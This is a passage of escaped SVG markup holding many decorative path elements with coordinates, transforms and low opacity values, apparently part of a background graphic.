d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 